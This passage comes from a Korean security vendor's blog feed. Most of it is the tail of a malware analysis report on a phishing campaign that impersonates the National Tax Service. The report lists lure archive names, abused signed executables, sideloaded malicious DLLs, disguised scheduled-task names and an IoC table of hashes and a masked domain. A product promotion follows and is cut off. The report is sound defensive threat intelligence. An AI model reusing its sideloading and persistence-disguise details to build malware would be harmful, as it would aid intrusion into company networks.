&lt;div&gt;
&lt;div&gt;&lt;span&gt;&lt;span data-contrast=&quot;auto&quot;&gt;&lt;span&gt;기업 명단3.zip&lt;/span&gt;&lt;/span&gt;&lt;span data-ccp-props=&quot;{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;134245417&amp;quot;:false,&amp;quot;335551550&amp;quot;:0,&amp;quot;335551620&amp;quot;:0,&amp;quot;335559738&amp;quot;:0,&amp;quot;335559739&amp;quot;:0}&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td style=&quot;text-align: center;&quot; data-celllook=&quot;4369&quot;&gt;
&lt;div&gt;
&lt;div&gt;&lt;span&gt;&lt;span data-contrast=&quot;auto&quot;&gt;&lt;span&gt;2026-03-18 20:04:14&lt;/span&gt;&lt;/span&gt;&lt;span data-ccp-props=&quot;{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;134245417&amp;quot;:false,&amp;quot;335551550&amp;quot;:0,&amp;quot;335551620&amp;quot;:0,&amp;quot;335559738&amp;quot;:0,&amp;quot;335559739&amp;quot;:0}&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;text-align: center;&quot; data-celllook=&quot;4369&quot;&gt;
&lt;div&gt;
&lt;div&gt;&lt;span&gt;&lt;span data-contrast=&quot;auto&quot;&gt;&lt;span&gt;기업 명단5.zip&lt;/span&gt;&lt;/span&gt;&lt;span data-ccp-props=&quot;{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;134245417&amp;quot;:false,&amp;quot;335551550&amp;quot;:0,&amp;quot;335551620&amp;quot;:0,&amp;quot;335559738&amp;quot;:0,&amp;quot;335559739&amp;quot;:0}&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td style=&quot;text-align: center;&quot; data-celllook=&quot;4369&quot;&gt;
&lt;div&gt;
&lt;div&gt;&lt;span&gt;&lt;span data-contrast=&quot;auto&quot;&gt;&lt;span&gt;2026-03-19&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;0&lt;/span&gt;&lt;span&gt;5:24:47&lt;/span&gt;&lt;/span&gt;&lt;span data-ccp-props=&quot;{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;134245417&amp;quot;:false,&amp;quot;335551550&amp;quot;:0,&amp;quot;335551620&amp;quot;:0,&amp;quot;335559738&amp;quot;:0,&amp;quot;335559739&amp;quot;:0}&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p style=&quot;text-align: center;&quot; data-ke-size=&quot;size16&quot;&gt;[표 2] 공격자&amp;nbsp;서버에&amp;nbsp;업로드&amp;nbsp;된&amp;nbsp;변종&amp;nbsp;파일&amp;nbsp;리스트&lt;/p&gt;
&lt;p style=&quot;text-align: center;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;로더로 사용된 정상 파일&lt;br /&gt;- nvgpu_x64.exe&amp;nbsp; &lt;br /&gt;- SandboxieCrypto.exe&amp;nbsp; &lt;br /&gt;- 444.exe&amp;nbsp; &lt;br /&gt;- クリックして閲覧.exe&amp;nbsp;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot;&gt;DLL 사이드로딩으로 사용된&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot;&gt;악성&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot;&gt;파일&lt;/span&gt; &lt;br /&gt;- nvml.dll&amp;nbsp; &lt;br /&gt;- SbieDll.dll&amp;nbsp; &lt;br /&gt;- vulkan-1.dll&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;지속성유지를 위해 사용된&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;작업&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;스케쥴러&lt;/span&gt;&lt;span&gt;명&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;- Microsoft&amp;nbsp;Compatibility&amp;nbsp;system&amp;nbsp; &lt;br /&gt;-.NET Framework NGEN v4.0.30417&amp;nbsp; &lt;br /&gt;-WindowsSafe&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;
&lt;li&gt;유포에&amp;nbsp;사용된&amp;nbsp;파일명&lt;br /&gt;- 0305.zip&amp;nbsp;(27.124.45.153_压缩_680.exe)&amp;nbsp; &lt;br /&gt;- 2026 सूचना.zip (2026 सूचना.exe)&amp;nbsp; &lt;br /&gt;- 032451.zip (1032451.exe)&amp;nbsp; &lt;br /&gt;- 1045781.zip (1045781.exe)&amp;nbsp; &lt;br /&gt;- 1202154.rar (Court indictment.exe)&amp;nbsp; &lt;br /&gt;- 5102320.zip (51055334.exe)&amp;nbsp; &lt;br /&gt;- 12025521.zip (12025521.exe)&amp;nbsp; &lt;br /&gt;- 51055334.zip (51055334.exe)&amp;nbsp; &lt;br /&gt;- 510553345.zip (DpcpAJ.exe)&amp;nbsp; &lt;br /&gt;- 5105533456.zip (118.107.43.25.exe)&amp;nbsp; &lt;br /&gt;- List of Companies Under Investigation(1).zip (Court indictment.exe)&amp;nbsp; &lt;br /&gt;- 공지사항.rar (DpcpAJ.exe)&amp;nbsp; &lt;br /&gt;- 기업 명단3.zip (기업 명단.exe)&amp;nbsp; &lt;br /&gt;- 기업 명단5.zip (기업 명단5.exe)&amp;nbsp; &lt;br /&gt;- 기업 조사 명단.zip (기업 조사 명단.exe)&amp;nbsp; &lt;br /&gt;- 점검 대상 명단 (2).zip (조회.exe)&amp;nbsp; &lt;br /&gt;- List of Companies.zip (List of Companies.exe)&lt;br /&gt;- 기업 조사 대상 명단.zip (기업 조사 대상 명단.exe)&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이는&amp;nbsp;공격&amp;nbsp;대상이&amp;nbsp;국내에&amp;nbsp;국한되지&amp;nbsp;않고&amp;nbsp;아시아&amp;nbsp;내&amp;nbsp;다른&amp;nbsp;국가까지&amp;nbsp;포함하고&amp;nbsp;있음을&amp;nbsp;시사하며,&amp;nbsp;이번&amp;nbsp;공격이&amp;nbsp;특정&amp;nbsp;국가를&amp;nbsp;대상으로&amp;nbsp;한&amp;nbsp;일회성&amp;nbsp;공격이&amp;nbsp;아닌&amp;nbsp;다수의&amp;nbsp;국가를&amp;nbsp;겨냥한&amp;nbsp;광범위한&amp;nbsp;캠페인일&amp;nbsp;가능성이&amp;nbsp;높습니다.&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h2 style=&quot;border-left: 8px solid #000000; padding: 12px 20px; background-color: #f8f9fa; color: #1a1a1a; font-weight: bold; font-size: 22px; margin: 30px 0 15px 0; border-bottom: 1px solid #e0e0e0; font-family: 'Pretendard', sans-serif; letter-spacing: -0.5px;&quot; data-ke-size=&quot;size26&quot;&gt;공격 특징&lt;/h2&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;b&gt;사회공학적&amp;nbsp;공격&amp;nbsp;&lt;/b&gt;&lt;br /&gt;국세청을 사칭하여 '세무조사'라는 심리적 압박 소재로 사용자의 파일 실행을 유도합니다. 취약점 악용 없이 사용자가 직접 악성 파일을 실행하도록 설계된 전형적인 사회공학적 기법입니다.&amp;nbsp;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;정상&amp;nbsp;소프트웨어&amp;nbsp;악용&lt;/b&gt;&lt;br /&gt;Intel의&amp;nbsp;정상&amp;nbsp;서명된&amp;nbsp;프로그램을&amp;nbsp;통해&amp;nbsp;함께&amp;nbsp;배포된&amp;nbsp;악성&amp;nbsp;DLL파일이&amp;nbsp;실행되는&amp;nbsp;방식으로&amp;nbsp;정상&amp;nbsp;파일을&amp;nbsp;악용해&amp;nbsp;보안&amp;nbsp;솔루션의&amp;nbsp;탐지를&amp;nbsp;우회합니다.&amp;nbsp;&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;위장을&amp;nbsp;통한&amp;nbsp;지속성&amp;nbsp;유지&lt;/b&gt;&amp;nbsp;&lt;br /&gt;Microsoft Compatibility system이라는 서비스명과 C:\Program Files\Common Files\ 경로를 사용하여 정상 시스템 구성요소로 위장합니다.&amp;nbsp;C2&amp;nbsp;주소&amp;nbsp;원격&amp;nbsp;업데이트&amp;nbsp;구조를&amp;nbsp;통해&amp;nbsp;특정&amp;nbsp;IP&amp;nbsp;차단에도&amp;nbsp;유연하게&amp;nbsp;대응&amp;nbsp;가능합니다.&amp;nbsp;&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;지속적/다국가&amp;nbsp;대상&amp;nbsp;공격&lt;/b&gt;&amp;nbsp;&amp;nbsp;&lt;br /&gt;공격자&amp;nbsp;서버&amp;nbsp;분석&amp;nbsp;결과,&amp;nbsp;최초&amp;nbsp;공격은&amp;nbsp;작년&amp;nbsp;12월&amp;nbsp;중순부터&amp;nbsp;시작되어&amp;nbsp;현재까지&amp;nbsp;지속되고&amp;nbsp;있으며,&amp;nbsp;특정&amp;nbsp;국가를&amp;nbsp;대상으로&amp;nbsp;한&amp;nbsp;일회성&amp;nbsp;공격이&amp;nbsp;아닌&amp;nbsp;다수의&amp;nbsp;국가를&amp;nbsp;겨냥한&amp;nbsp;지속적인&amp;nbsp;캠페인으로&amp;nbsp;판단됩니다.&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;기업&amp;nbsp;사용자를&amp;nbsp;타겟으로&amp;nbsp;한&amp;nbsp;이번&amp;nbsp;국세청&amp;nbsp;세무조사&amp;nbsp;사칭&amp;nbsp;피싱&amp;nbsp;공격은&amp;nbsp;감염&amp;nbsp;시&amp;nbsp;원격코드&amp;nbsp;실행&amp;nbsp;및&amp;nbsp;내부망&amp;nbsp;확산&amp;nbsp;등&amp;nbsp;광범위한&amp;nbsp;피해를&amp;nbsp;초래할&amp;nbsp;수&amp;nbsp;있습니다.&amp;nbsp;특히&amp;nbsp;공격자가&amp;nbsp;지속적으로&amp;nbsp;변종파일을&amp;nbsp;업데이트하며&amp;nbsp;공격을&amp;nbsp;이어가고&amp;nbsp;있는&amp;nbsp;만큼,&amp;nbsp;기업&amp;nbsp;보안담당자와&amp;nbsp;사용자의&amp;nbsp;각별한&amp;nbsp;주의가&amp;nbsp;필요합니다.&amp;nbsp;&amp;nbsp; &lt;br /&gt;&lt;br /&gt;국세청에서는 &amp;lsquo;세무조사&amp;rsquo;와 관련된 메일을 발송하지 않는다는 점을 명심하시고, 의심스러운 메일의 링크 클릭이나 출처가 불분명한 파일을 실행하지 않도록 보안 수칙을 준수하시어 피해를 예방하시기 바랍니다.&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #1a2c4e; font-size: 1.12em; font-weight: bold; letter-spacing: 0px;&quot;&gt;IoC&lt;/span&gt;&lt;/p&gt;
&lt;div class=&quot;ioc-container&quot;&gt;
&lt;table style=&quot;width: 100%; border-collapse: collapse; line-height: 1.6; font-size: 14px; height: 70px;&quot; data-ke-align=&quot;alignLeft&quot;&gt;
&lt;thead&gt;
&lt;tr style=&quot;border-top: 2px solid #e1e4e8; border-bottom: 1px solid #e1e4e8; text-align: left; background-color: #fcfcfc; height: 22px;&quot;&gt;
&lt;th style=&quot;padding: 15px 10px; width: 41.3953%; color: #333333; height: 22px;&quot;&gt;Indicator&lt;/th&gt;
&lt;th style=&quot;padding: 15px 10px; width: 12.4419%; color: #333333; height: 22px;&quot;&gt;Type&lt;/th&gt;
&lt;th style=&quot;padding: 15px 10px; width: 19.6512%; color: #333333; height: 22px;&quot;&gt;Description&lt;/th&gt;
&lt;th style=&quot;padding: 15px 10px; width: 26.5116%; color: #333333; height: 22px;&quot;&gt;Detection Name&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr style=&quot;border-bottom: 1px solid #e1e4e8; height: 24px;&quot;&gt;
&lt;td style=&quot;padding: 15px 10px; color: #444444; word-break: break-all; width: 41.3953%; height: 24px;&quot;&gt;9FD5920FE1FE407DC8BA6871550CA012&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #444444; width: 12.4419%; height: 24px;&quot;&gt;MD5&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #666666; width: 19.6512%; height: 24px;&quot;&gt;DLL 파일&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #666666; width: 26.5116%; height: 24px;&quot;&gt;Backdoor.SideLoad.A&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;border-bottom: 1px solid #e1e4e8; height: 24px;&quot;&gt;
&lt;td style=&quot;padding: 15px 10px; color: #444444; word-break: break-all; width: 41.3953%; height: 24px;&quot;&gt;B59F73817733D2986425B34FD28A1DC4&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #444444; width: 12.4419%; height: 24px;&quot;&gt;&lt;span style=&quot;color: #444444; text-align: start;&quot;&gt;MD5&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #666666; width: 19.6512%; height: 24px;&quot;&gt;BIN 파일&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #666666; width: 26.5116%; height: 24px;&quot;&gt;Trojan.BIN.Encoded&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;border-bottom: 1px solid #e1e4e8; height: 24px;&quot;&gt;
&lt;td style=&quot;padding: 15px 10px; color: #444444; word-break: break-all; width: 41.3953%; height: 24px;&quot;&gt;hxxps://s**-ac******.io&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #444444; width: 12.4419%; height: 24px;&quot;&gt;&lt;span style=&quot;color: #444444; text-align: start;&quot;&gt;DOMAIN&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #666666; width: 19.6512%; height: 24px;&quot;&gt;피싱 사이트&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #666666; width: 26.5116%; height: 24px;&quot;&gt;&amp;nbsp;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;400&quot; data-origin-height=&quot;150&quot;&gt;&lt;a href=&quot;https://www.estsecurity.com/&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/br3Pkd/dJMcah4SbCD/q3vFCj8gs7vbJYYu8lNo9k/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fbr3Pkd%2FdJMcah4SbCD%2Fq3vFCj8gs7vbJYYu8lNo9k%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;400&quot; height=&quot;150&quot; data-origin-width=&quot;400&quot; data-origin-height=&quot;150&quot;/&gt;&lt;/a&gt;&lt;/figure&gt;
&lt;/p&gt;</description>
      <category>악성코드 분석 리포트</category>
      <author>알약4</author>
      <guid isPermaLink="true">https://alyacofficialblog.tistory.com/5741</guid>
      <comments>https://alyacofficialblog.tistory.com/5741#entry5741comment</comments>
      <pubDate>Tue, 24 Mar 2026 19:01:45 +0900</pubDate>
    </item>
    <item>
      <title>Re:START 신규 프로모션 - 기업 보안, 지금 점검하고 가장 좋은 조건으로 도입하세요!</title>
      <link>https://alyacofficialblog.tistory.com/5736</link>
      <description>&lt;p style=&quot;text-align: right;&quot; data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light'; background-color: #eeeeee; color: #333333; text-align: start;&quot;&gt;by 이스트시큐리티 마케팅팀&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;안녕하세요, 이스트시큐리티입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;랜섬웨어, 악성코드, 내부 문서 유출, 생성형 AI 도입에 따른 보안 위험까지. 기업을 둘러싼 보안 위협은 그 범위와 속도가 날로 빠르게 진화하고 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;'언젠가는 도입해야지'라고 미뤄왔던 보안 솔루션, 지금이 가장 좋은 조건으로 시작할 수 있는 타이밍입니다!&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;ESTsecurity_신규윈백프로모션_Variation_4분할 1.jpg&quot; data-origin-width=&quot;1400&quot; data-origin-height=&quot;1400&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cPjk3r/dJMcaiWLJjI/qil6ckbKkzqaucvDBXxfk0/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cPjk3r/dJMcaiWLJjI/qil6ckbKkzqaucvDBXxfk0/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cPjk3r/dJMcaiWLJjI/qil6ckbKkzqaucvDBXxfk0/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcPjk3r%2FdJMcaiWLJjI%2Fqil6ckbKkzqaucvDBXxfk0%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1400&quot; height=&quot;1400&quot; data-filename=&quot;ESTsecurity_신규윈백프로모션_Variation_4분할 1.jpg&quot; data-origin-width=&quot;1400&quot; data-origin-height=&quot;1400&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h2 style=&quot;border-left: 8px solid #000000; padding: 12px 20px; background-color: #f8f9fa; color: #1a1a1a; font-weight: bold; font-size: 22px; margin: 30px 0 15px 0; border-bottom: 1px solid #e0e0e0; font-family: 'Pretendard', sans-serif; letter-spacing: -0.5px;&quot; data-ke-size=&quot;size26&quot;&gt;지금 도입하세요, 위협은 기다려주지 않습니다&lt;/h2&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;오늘날 기업이 직면한 보안 위협은 단순한 바이러스 감염 수준을 훨씬 넘어섰습니다.&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div style=&quot;background-color: #ffffff; border: 1px solid #ced4da; border-radius: 8px; padding: 20px; margin: 20px 0; box-shadow: 0 2px 4px rgba(0,0,0,0.05);&quot;&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;랜섬웨어&lt;/b&gt;&amp;nbsp;- 파일을 암호화하고 복구 대가로 금전을 요구&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;악성코드&lt;/b&gt;&amp;nbsp;- 내부 시스템에 침투해 장기간 잠복하며 정보 수집&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;내부 문서 유출&lt;/b&gt;&amp;nbsp;- 퇴직자&amp;middot;내부자에 의한 핵심 자료 유출&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;생성형 AI 도입 시 보안 위험&lt;/b&gt;&amp;nbsp;- 업무 데이터의 외부 AI 유출 위험&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;보안 투자를 미루는 사이, 단 한 번의 침해 사고가 수년간 쌓아온 고객 신뢰와 사업 기반을 무너뜨릴 수 있습니다. 사고가 난 후 도입하는 보안은 언제나 더 많은 비용과 더 큰 피해를 동반합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;blockquote data-ke-style=&quot;style3&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #1b711d;&quot;&gt;  보안은 단순한 예방이 아닙니다. 기업 경쟁력과 신뢰를 지키는 핵심 전략입니다.&lt;/span&gt;&lt;/blockquote&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;ESTsecurity_신규윈백프로모션_Variation_4분할 2.jpg&quot; data-origin-width=&quot;1400&quot; data-origin-height=&quot;1400&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/EvCBJ/dJMb99Mi25l/1biTGgGtJumwpmPmmccTi1/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/EvCBJ/dJMb99Mi25l/1biTGgGtJumwpmPmmccTi1/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/EvCBJ/dJMb99Mi25l/1biTGgGtJumwpmPmmccTi1/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FEvCBJ%2FdJMb99Mi25l%2F1biTGgGtJumwpmPmmccTi1%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1400&quot; height=&quot;1400&quot; data-filename=&quot;ESTsecurity_신규윈백프로모션_Variation_4분할 2.jpg&quot; data-origin-width=&quot;1400&quot; data-origin-height=&quot;1400&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h2 style=&quot;border-left: 8px solid #000000; padding: 12px 20px; background-color: #f8f9fa; color: #1a1a1a; font-weight: bold; font-size: 22px; margin: 30px 0 15px 0; border-bottom: 1px solid #e0e0e0; font-family: 'Pretendard', sans-serif; letter-spacing: -0.5px;&quot; data-ke-size=&quot;size26&quot;&gt;Re:START 프로모션이란?&lt;/h2&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;Re:START 프로모션은 기업의 보안 도입 진입 장벽을 낮추고, 체계적인 보안 환경 구축을 지원하기 위해 이스트시큐리가 eGISEC 2026 부스 방문&amp;middot;상담 고객을 대상으로 진행한 신규 도입 특별 혜택입니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;현장에서 3일 한정으로 운영 예정이었으나, 전시 기간 중 방문하지 못한 고객사의 높은 관심과 요청에 힘입어 온라인으로 확대 연장하게 되었습니다! 이제 기간 내 신규 및 윈백 고객이라면 누구나 동일한 혜택을 받으실 수 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div style=&quot;background-color: #ffffff; border: 1px solid #ced4da; border-radius: 8px; padding: 20px; margin: 20px 0; box-shadow: 0 2px 4px rgba(0,0,0,0.05);&quot;&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;▪️&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;프로모션 기간 :&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;2026년 3월 18일 ~ 4월 30일&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;margin: 0; color: #212529;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;▪️&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;프로모션 대상&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
